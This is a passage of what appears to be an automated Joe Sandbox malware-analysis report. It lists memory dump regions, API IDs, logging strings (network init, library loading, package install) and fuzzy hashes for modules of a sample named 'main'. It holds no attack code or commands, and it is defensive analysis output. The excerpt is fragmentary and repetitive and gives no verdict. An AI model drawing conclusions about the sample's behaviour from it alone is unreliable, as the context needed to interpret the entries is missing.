                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Startupfflushfwrite
                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                                                                  • API String ID: 3771387389-898331216
                                                                                                                  • Opcode ID: 6f88879cea466673317dceab2be4fb4acada4a0518f6b3e7621b2704ff40c967
                                                                                                                  • Instruction ID: 0ffeb89e2d5a09915f641c0cbae993332ffc4df1033b99d822f1cc7caf58a049
                                                                                                                  • Opcode Fuzzy Hash: 6f88879cea466673317dceab2be4fb4acada4a0518f6b3e7621b2704ff40c967
                                                                                                                  • Instruction Fuzzy Hash: 0DF01761B08D87D5FF11AB16EC653F82211AF543A4F8400B2D84D4A6FAEEEEE649C714
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Startupfflushfwrite
                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                                                                  • API String ID: 3771387389-898331216
                                                                                                                  • Opcode ID: 8c7461419add698801d5ed48bb0f19824aa43ec2136d0b0c711ea3f1ee45edd6
                                                                                                                  • Instruction ID: d02b437ca398c3847a05d8b0807b4f5ae7d22795c90458068d83e49c7f9018ab
                                                                                                                  • Opcode Fuzzy Hash: 8c7461419add698801d5ed48bb0f19824aa43ec2136d0b0c711ea3f1ee45edd6
                                                                                                                  • Instruction Fuzzy Hash: 35F04968B1CC46D2FB109713E8003F51661AFA7FA5F4400F3C40D461B6EE6CE64A8700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Startupfflushfwrite
                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                                                                  • API String ID: 3771387389-898331216
                                                                                                                  • Opcode ID: 65cd0c52382f27a13dc80fb6b7acc97793f7c43f6e91f9d63a2dc8d564be2d70
                                                                                                                  • Instruction ID: 3f0f561f0fcfcc076451c945d9eaa8b67a5c24ef006eb00f0265eefd6ce1f642
                                                                                                                  • Opcode Fuzzy Hash: 65cd0c52382f27a13dc80fb6b7acc97793f7c43f6e91f9d63a2dc8d564be2d70
                                                                                                                  • Instruction Fuzzy Hash: 3FF090A4B0DC0792FB129B56E8103F8125AAF003A0F4000BAD80D4A1B1EE9DE658C320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Startupfflushfwrite
                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                                                                  • API String ID: 3771387389-898331216
                                                                                                                  • Opcode ID: e3dde975791e3de8b401d5cfbee0aeead71d3cb9e73e6ec49a542f101dd95df3
                                                                                                                  • Instruction ID: c930110f3009d4a667ed1e1bda237866eab9658782d227b5580edf3fb375176b
                                                                                                                  • Opcode Fuzzy Hash: e3dde975791e3de8b401d5cfbee0aeead71d3cb9e73e6ec49a542f101dd95df3
                                                                                                                  • Instruction Fuzzy Hash: 4AF017A1B0DE4391FF109B97EC453F62318AF107A4F8424B2D80E4A2B6EE2CE5498720
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$HandleModule_mbscpy
                                                                                                                  • String ID: [E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x)$[I] (%s) -> Done(pkg_path=%s,tgt_path=%s)$package_install$service
                                                                                                                  • API String ID: 3656010895-1379287937
                                                                                                                  • Opcode ID: 400cfecd4f6eabefaae7f4a45cb318ea3c181757ab2ceb9ae91811f63d49ae76
                                                                                                                  • Instruction ID: f187728d6019b7de0262aa6d25cc188d7a642668bd4ca9adc15296ac1a7571af
                                                                                                                  • Opcode Fuzzy Hash: 400cfecd4f6eabefaae7f4a45cb318ea3c181757ab2ceb9ae91811f63d49ae76
                                                                                                                  • Instruction Fuzzy Hash: 86316172A0C6C791FB10EF64E4907EEA361EB85364FC40533EA4E47685DEADD509C750
                                                                                                                  APIs
                                                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,00000157C50713D0,?,00007FF7C1AB292B), ref: 00007FF7C1AB22A3
                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00000157C50713D0,?,00007FF7C1AB292B), ref: 00007FF7C1AB22D6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                  • Opcode ID: 1562570c0f50b7283fd6ae6107e512a80eca33ed24826a6847df793e12344371
                                                                                                                  • Instruction ID: 66616cf15bbc41dee708c95cccf99a80e46fcba3fd5960a5fc888fdd53dd7a69
                                                                                                                  • Opcode Fuzzy Hash: 1562570c0f50b7283fd6ae6107e512a80eca33ed24826a6847df793e12344371
                                                                                                                  • Instruction Fuzzy Hash: 19F0D1A0A0968741FB11AF46A9209BDE2217F58BE0F944033CD4C4BB95EEADE542C320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                  • Opcode ID: fafc799aa92d9d60547a22b758ba0d3b5ae50fba84d732ef87da3ca2ea9f435e
                                                                                                                  • Instruction ID: 9736af8a16d255916c9888b07bdaa1a99c2678058fa08f60c6b008cce06d6ac4
                                                                                                                  • Opcode Fuzzy Hash: fafc799aa92d9d60547a22b758ba0d3b5ae50fba84d732ef87da3ca2ea9f435e
                                                                                                                  • Instruction Fuzzy Hash: 71F0A290A0EF47D1FF264F07A901DF95659AF04BE8F4860B1CC4D077B4EE2CA5468300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                  • Opcode ID: 0a66c11b569c4f10f79f34f7ec77922b59573ebafc7ce5539a2654754b0e73a4
                                                                                                                  • Instruction ID: 5a64b5d3a574ca9ee0b893ef8469d5f5fbd3fc9bccb8113bb726729a61810223
                                                                                                                  • Opcode Fuzzy Hash: 0a66c11b569c4f10f79f34f7ec77922b59573ebafc7ce5539a2654754b0e73a4
                                                                                                                  • Instruction Fuzzy Hash: 70F086A0B0EA0392FA019B0BBA401FA12116F46FF5F0860F2CD1D0B7A6EE2CE5568300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                  • Opcode ID: a7cfe317345e09ad6b23b45929449eeeeaa1a6b025e17c0387b62b8fd99eaad9
                                                                                                                  • Instruction ID: 220296ad09da86f9471e418c0503f436c5b7691aa0591ac168f41d5faa43438a
                                                                                                                  • Opcode Fuzzy Hash: a7cfe317345e09ad6b23b45929449eeeeaa1a6b025e17c0387b62b8fd99eaad9
                                                                                                                  • Instruction Fuzzy Hash: 69F0A990A08A4782FF119B47BC102E912226F0ABE4F0840B1CC5D0B7F8FEACEA469304
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                  • Opcode ID: 67dab3cd625592a012ad7dec1e73096218c47b3540de6f7a9e44a37564ad1708
                                                                                                                  • Instruction ID: 4dad5a03412f721e4f858f279c9f3531af5e1f22fe77dd990194b41f44699049
                                                                                                                  • Opcode Fuzzy Hash: 67dab3cd625592a012ad7dec1e73096218c47b3540de6f7a9e44a37564ad1708
                                                                                                                  • Instruction Fuzzy Hash: 8BF06D54F1DE4792FA52C797A8002B95252AF86FE4F1840F3DC4D4B7B4EF2CA5468300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                  • Opcode ID: dbcf099b603b3ec46b1e2511ebe9725b65a6cce9015f211c21d5d371d3fdd735
                                                                                                                  • Instruction ID: 8750f9a37f951b53a572ba512bc41a614aa2f9de532ee360e1be003f71d89bc5
                                                                                                                  • Opcode Fuzzy Hash: dbcf099b603b3ec46b1e2511ebe9725b65a6cce9015f211c21d5d371d3fdd735
                                                                                                                  • Instruction Fuzzy Hash: 9AF0D195A0DE4381FF228B87A8001A9571A6F44BF4F5841B5DD0C0B7B4EF6CE5AA8300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                  • Opcode ID: 0279ee0fba7c6e178516fd32448990f9dbb55b2387454419a162d72c715561de
                                                                                                                  • Instruction ID: cd190a78cc78940587662a6f917e353ebeeae1a993397093ebc04b5e94364ed8
                                                                                                                  • Opcode Fuzzy Hash: 0279ee0fba7c6e178516fd32448990f9dbb55b2387454419a162d72c715561de
                                                                                                                  • Instruction Fuzzy Hash: 8BF08150A09E5352FF119BD7AD006A767696F04BE0F8855B1DD4D0B7B4EE2CE5468300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                  • API String ID: 4085810780-3386190286
                                                                                                                  • Opcode ID: 697fd883e4c98c3a111c703db0c1e2690921e3af5536f40dc2a3e64cf62ec6d9
                                                                                                                  • Instruction ID: efa32403028c216aec5d6d44be9682250260daf832706317d7bfb7d0dc211119
                                                                                                                  • Opcode Fuzzy Hash: 697fd883e4c98c3a111c703db0c1e2690921e3af5536f40dc2a3e64cf62ec6d9
                                                                                                                  • Instruction Fuzzy Hash: D4F09A60E0EE47D0EF36AF1BA840CF41648AF05BB9B4835B0C80C06B70EE2CA9858310
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                  • API String ID: 4085810780-3386190286
                                                                                                                  • Opcode ID: e9b2e49849ddc16e52caa7a8cac415f1aaf56702dfb014bfad4af1c08c753447
                                                                                                                  • Instruction ID: 59ced872b02093e216a16845ae1313a555e3d886d93d79f2f5d44c98a5e955b6
                                                                                                                  • Opcode Fuzzy Hash: e9b2e49849ddc16e52caa7a8cac415f1aaf56702dfb014bfad4af1c08c753447
                                                                                                                  • Instruction Fuzzy Hash: 9DF01260B0EE0791FA55A76BB9804F91A506F06FB1B8824F2CD0D16776EE2CB596C300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                  • API String ID: 4085810780-3386190286
                                                                                                                  • Opcode ID: eddca9e64613da5a5af11230b1fdb9adc60d80f962126bf1a1c4b22804975db0
                                                                                                                  • Instruction ID: 05ad158a2bd5068a9552b9763586b46325432025cdaeff441433275ddb472241
                                                                                                                  • Opcode Fuzzy Hash: eddca9e64613da5a5af11230b1fdb9adc60d80f962126bf1a1c4b22804975db0
                                                                                                                  • Instruction Fuzzy Hash: 28F03A11A09E4B94EF11EB5BBC604F012615F1ABE0B4801F1C80C167F5FD9CA9868304
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                  • API String ID: 4085810780-3386190286
                                                                                                                  • Opcode ID: 7b7284ad99e7ff1f44cb58d40aaf81ba3cdcdc8e088978f854639b2754e328da
                                                                                                                  • Instruction ID: 04307e47ece7f18266d73c83e0af70cdb0e2f0b2e86ec7501bcd478610e01e1b
                                                                                                                  • Opcode Fuzzy Hash: 7b7284ad99e7ff1f44cb58d40aaf81ba3cdcdc8e088978f854639b2754e328da
